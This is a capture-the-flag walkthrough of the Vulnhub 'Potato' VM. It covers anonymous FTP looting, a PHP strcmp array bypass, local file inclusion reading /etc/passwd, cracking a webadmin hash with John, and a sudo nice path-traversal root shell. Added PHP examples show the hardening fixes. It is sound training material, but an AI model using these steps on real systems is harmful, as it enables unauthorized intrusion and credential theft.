Potato

Identify the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.85.0/16   |   Screen View: Unique Hosts                                                                          
                                                                                                                                              
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.114  08:00:27:77:c6:7c      2     120  PCS Systemtechnik GmbH                                                                     
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                             
 192.168.56.100  08:00:27:b5:6e:e2      1      60  PCS Systemtechnik GmbH 

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.114.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.114 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 01:55 EST
Nmap scan report for bogon (192.168.56.114)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
2112/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
MAC Address: 08:00:27:77:C6:7C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.19 seconds

The target host has three open ports: 22 (SSH), 80 (HTTP) and 2112 (FTP).

Get Access

Start information gathering with the FTP service.

┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ftp 192.168.56.114 -P 2112                                 
Connected to 192.168.56.114.
220 ProFTPD Server (Debian) [::ffff:192.168.56.114]
Name (192.168.56.114:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.56.107 !
230-
230-The local time is: Fri Nov 11 14:57:04 2022
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47701|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 ftp      ftp          4.0k Aug  2  2020 .
drwxr-xr-x   2 ftp      ftp          4.0k Aug  2  2020 ..
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
226 Transfer complete
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||5403|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
   901       29.58 KiB/s 
226 Transfer complete
901 bytes received in 00:00 (14.61 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||1134|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
    54      941.68 KiB/s 
226 Transfer complete
54 bytes received in 00:00 (46.29 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ls
index.php.bak  nmap_full_scan  welcome.msg
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat index.php.bak 
<html>
<head></head>
<body>

<?php

$pass= "potato"; //note Change this password regularly

if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
  }
  exit();
}
?>


  <form action="index.php?login=1" method="POST">
                <h1>Login</h1>
                <label><b>User:</b></label>
                <input type="text" name="username" required>
                </br>
                <label><b>Password:</b></label>
                <input type="password" name="password" required>
                </br>
                <input type="submit" id='submit' value='Login' >
  </form>
</body>
</html>

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat welcome.msg  
Welcome, archive user %U@%R !

The local time is: %T

The target host allows anonymous FTP access. After downloading the files locally, a username and password turned up in the backup, a pleasant surprise:

admin

potato

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ gobuster dir -u http://192.168.56.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.114
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/11 01:59:23 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.114/admin/]
/potato               (Status: 301) [Size: 317] [--> http://192.168.56.114/potato/]
/server-status        (Status: 403) [Size: 279]
Progress: 219152 / 220561 (99.36%)===============================================================
2022/11/11 02:00:08 Finished
===============================================================

The /admin directory was discovered; log in to that page with the username and password found above.

But the login does not succeed, which is very strange. After many attempts it keeps reporting a wrong password. This is actually a trap.

In PHP, == only compares the final values on its two sides, not their data types. === first checks whether the data types on both sides are the same, and then whether the final values are the same; it returns true only if both match.

An exploitation method was found online; it ultimately relies on PHP's NULL == 0 behaviour.

Simply put, the password parameter is supposed to be submitted as a string, but here an empty array is submitted instead. strcmp() then returns NULL, and under PHP's loose comparison (==) NULL equals 0, so the condition is satisfied and the login succeeds.
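To make the comparison issue concrete, here is an added example (not code from the original VM or from the blog post) that places the check from index.php.bak beside a hardened version and runs both against the inputs discussed above. The function names, the `$cases` inputs and the use of hash_equals() are my own choices; the password constant is the one from the backup.

```php
<?php
// Added example, not the VM's index.php: the vulnerable check from the backup
// next to a hardened one. The behaviour described in the comments is PHP 7.x,
// which the loose-comparison bypass relies on; PHP 8 makes strcmp() throw a
// TypeError when it receives a non-string argument instead of returning NULL.

$pass = "potato"; // same constant as index.php.bak

// Vulnerable: mirrors the logic in index.php.bak.
function vulnerable_login($username, $password, string $pass): bool
{
    // PHP 7.x: strcmp() with an array argument emits a warning (suppressed with @)
    // and returns NULL; NULL == 0 is true under loose comparison, so the check passes.
    return @strcmp($username, "admin") == 0 && @strcmp($password, $pass) == 0;
}

// Hardened: refuse anything that is not a string, then compare strictly.
function hardened_login($username, $password, string $pass): bool
{
    if (!is_string($username) || !is_string($password)) {
        return false; // arrays, null, numbers never reach the comparison
    }
    // hash_equals() compares two strings in constant time and only accepts strings.
    return hash_equals("admin", $username) && hash_equals($pass, $password);
}

// Constructed inputs: a wrong guess, the right password, and the empty-array
// trick (a "password[]=" field in the POST body instead of "password=...").
$cases = [
    'wrong password'   => ['admin', 'guess'],
    'correct password' => ['admin', 'potato'],
    'array password'   => ['admin', []],
];

foreach ($cases as $label => [$u, $p]) {
    printf("%-17s vulnerable=%s hardened=%s\n", $label,
        var_export(vulnerable_login($u, $p, $pass), true),
        var_export(hardened_login($u, $p, $pass), true));
}
```

On PHP 7.x the vulnerable function accepts the array input for exactly the reason the post gives, while the hardened one rejects it because is_string() fails before any comparison is attempted. On PHP 8 strcmp() throws a TypeError for the array instead, so that particular bypass no longer works as described, but the is_string() guard plus strict comparison is still the correct fix. Two further points a reviewer would raise against index.php.bak: the password should be verified against a password_hash() digest rather than a plaintext constant, and the plaintext password should never be written back into a cookie as setcookie('pass', $pass, ...) does.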

Login succeeded.

Under the Logs tab, analysing the requests with Burp shows that when a file is selected, the POST request body contains a file parameter. Check whether a local file inclusion (LFI) vulnerability exists.

An LFI vulnerability does exist: /etc/passwd can be read.
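As an added example (not the dashboard code running on the VM, which the post does not show), here is how a log viewer that takes a `file` parameter can be written so that the parameter cannot reach arbitrary files such as /etc/passwd. The directory /var/www/logs, the log file names and the function names are assumptions.

```php
<?php
// Added example, not the VM's dashboard: a log viewer that accepts a
// user-supplied "file" parameter like the Logs page does, but only ever serves
// files from one fixed directory and one fixed allowlist.

const LOG_DIR = '/var/www/logs';                                // assumed location
const ALLOWED_LOGS = ['access.log', 'error.log', 'audit.log'];  // assumed allowlist

/**
 * Return the absolute path to serve, or null if the request must be refused.
 * Two independent checks: the name must be on the allowlist, and the resolved
 * path must still lie inside LOG_DIR (defence in depth, e.g. against symlinks).
 */
function resolve_log_file($requested): ?string
{
    if (!is_string($requested)) {
        return null;                          // missing parameter or an array
    }
    // Exact-match allowlist on the bare name: "../../../etc/passwd", absolute
    // paths, null bytes and stream wrappers are all rejected here.
    if (!in_array($requested, ALLOWED_LOGS, true)) {
        return null;
    }
    $base = realpath(LOG_DIR);
    $full = realpath(LOG_DIR . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;                          // directory or file does not exist
    }
    // Containment check: the canonical path must start with the canonical base dir.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

function show_log($requested): void
{
    $path = resolve_log_file($requested);
    if ($path === null) {
        http_response_code(400);
        echo "Invalid log selection\n";
        return;
    }
    header('Content-Type: text/plain; charset=utf-8');
    readfile($path);   // output as text; never include()/require() a user-chosen file
}

// Constructed requests: one legitimate name and the two forms of the /etc/passwd
// read seen above. Only the first can ever resolve.
foreach (['access.log', '../../../etc/passwd', '/etc/passwd'] as $req) {
    printf("%-22s -> %s\n", $req, resolve_log_file($req) ?? 'refused');
}
```

Run from the command line, every request in the loop is refused unless /var/www/logs/access.log actually exists on that machine, because realpath() returns false for a missing file; the two traversal inputs are rejected by the allowlist before realpath() is even consulted. The allowlist is the real control, and the containment check guards against a later change that relaxes it. Using readfile() rather than include() matters as well: even if a path check were bypassed, the file would be returned as text rather than executed as PHP.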

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
florianges:x:1000:1000:florianges:/home/florianges:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

The hashed password of webadmin is $1$webadmin$3sXBxGUtDGIFAcnNTNhi6/

┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ echo '$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/' > webadmin_hash
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ cat webadmin_hash 
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ john --wordlist=/usr/share/wordlists/fasttrack.txt webadmin_hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 88.58% (ETA: 02:19:38) 0g/s 0p/s 0c/s 0C/s
Session aborted
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt webadmin_hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragon           (?)     
1g 0:00:00:00 DONE (2022-11-11 02:21) 6.250g/s 1200p/s 1200c/s 1200C/s 123456..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                              
┌──(kali㉿kali)-[~/Vulnhub/Potato]
└─$ ssh webadmin@192.168.56.114                                
The authenticity of host '192.168.56.114 (192.168.56.114)' can't be established.
ED25519 key fingerprint is SHA256:9DQds4tRzLVKtayQC3VgIo53wDRYtKzwBRgF14XKjCg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.114' (ED25519) to the list of known hosts.
webadmin@192.168.56.114's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 11 Nov 2022 03:22:00 PM UTC

  System load:  0.24               Processes:               115
  Usage of /:   11.9% of 31.37GB   Users logged in:         0
  Memory usage: 36%                IPv4 address for enp0s3: 192.168.56.114
  Swap usage:   0%


61 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Aug  2 19:56:20 2020 from 192.168.1.11
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)
webadmin@serv:~$ 

Privilege escalation

webadmin@serv:~$ sudo -l
[sudo] password for webadmin: 
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$ sudo /bin/nice /notes/../bin/bash
root@serv:/home/webadmin# cd /root
root@serv:~# ls
root.txt  snap
root@serv:~# cat root.txt
bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==
root@serv:~# 

Original article: http://www.cnblogs.com/jason-huawen/p/16880632.html
